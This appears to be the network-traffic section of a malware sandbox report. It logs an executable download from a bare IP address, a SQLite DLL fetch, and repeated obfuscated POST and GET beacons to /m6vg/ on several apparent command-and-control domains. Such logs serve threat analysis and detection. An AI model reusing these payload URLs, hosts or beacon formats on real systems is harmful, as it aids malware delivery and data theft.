Network Analysis

GET /_errorpages/ghostzx.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 2.59.254.18 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 17 Aug 2023 09:17:59 GMT Server: Apache Last-Modified: Thu, 17 Aug 2023 01:56:33 GMT ETag: "96600-60314b8ba72c3" Accept-Ranges: bytes Content-Length: 615936 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream

POST /m6vg/ HTTP/1.1 Host: www.local-masterfab.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.local-masterfab.pro Content-Type: application/x-www-form-urlencoded Content-Length: 176 Cache-Control: no-cache Connection: close Referer: http://www.local-masterfab.pro/m6vg/ User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4

HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Thu, 17 Aug 2023 09:19:06 GMT content-type: text/html last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: W/"63f68860-251" content-encoding: gzip connection: close transfer-encoding: chunked

GET /2017/sqlite-dll-win32-x86-3190000.zip HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: www.sqlite.org Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Thu, 17 Aug 2023 09:19:08 GMT Last-Modified: Tue, 23 May 2017 16:54:33 GMT Cache-Control: max-age=120 ETag: "m59246949s6cb3a" Content-type: application/zip; charset=utf-8 Content-length: 445242

GET /m6vg/?3e4VFiK=qlsSz55dMEDh80zakVPbHjaF8j4oNypzrjIj/nO5OsiiIMQ4OCb3eb3/aciAfJPzlTtsA232D702JdziOuhcEJIUeFVyn6zrybpmvBo=&FFb=fqnK4mKb5F HTTP/1.1 Host: www.local-masterfab.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4

HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Thu, 17 Aug 2023 09:19:08 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes connection: close

POST /m6vg/ HTTP/1.1 Host: www.sonokiz.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.sonokiz.xyz Content-Type: application/x-www-form-urlencoded Content-Length: 188 Cache-Control: no-cache Connection: close Referer: http://www.sonokiz.xyz/m6vg/ User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4

HTTP/1.1 404 Not Found Date: Thu, 17 Aug 2023 09:19:25 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html

GET /m6vg/?3e4VFiK=OU8I4t4PJh7jLwKM8g7zNLnIXKzFYO4EOKNLYn2/07El/+gDHE38bA7ufp76Z7q9f8ZNVj+wQy/7gIPBvltigVtQEDdIb2L6NYl27Fw=&FFb=fqnK4mKb5F HTTP/1.1 Host: www.sonokiz.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4

HTTP/1.1 404 Not Found Date: Thu, 17 Aug 2023 09:19:28 GMT Server: Apache Content-Length: 38381 Connection: close Content-Type: text/html; charset=utf-8

POST /m6vg/ HTTP/1.1 Host: www.belatofo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.belatofo.com Content-Type: application/x-www-form-urlencoded Content-Length: 188 Cache-Control: no-cache Connection: close Referer: http://www.belatofo.com/m6vg/ User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4

HTTP/1.1 404 Not Found Date: Thu, 17 Aug 2023 09:19:33 GMT Server: Apache Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1

GET /m6vg/?3e4VFiK=zU2i1DyrLTvj8GmsZ3o7R6kW1xY2b3weixFFYEzXXEr/gEIBiemlOi0xftl7Tao5JEAa7dRSygfLZB5gXWVWN+Vv06aLmgNr2ZdGEQw=&FFb=fqnK4mKb5F HTTP/1.1 Host: www.belatofo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F69 Safari/600.1.4

HTTP/1.1 404 Not Found Date: Thu, 17 Aug 2023 09:19:36 GMT Server: Apache Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1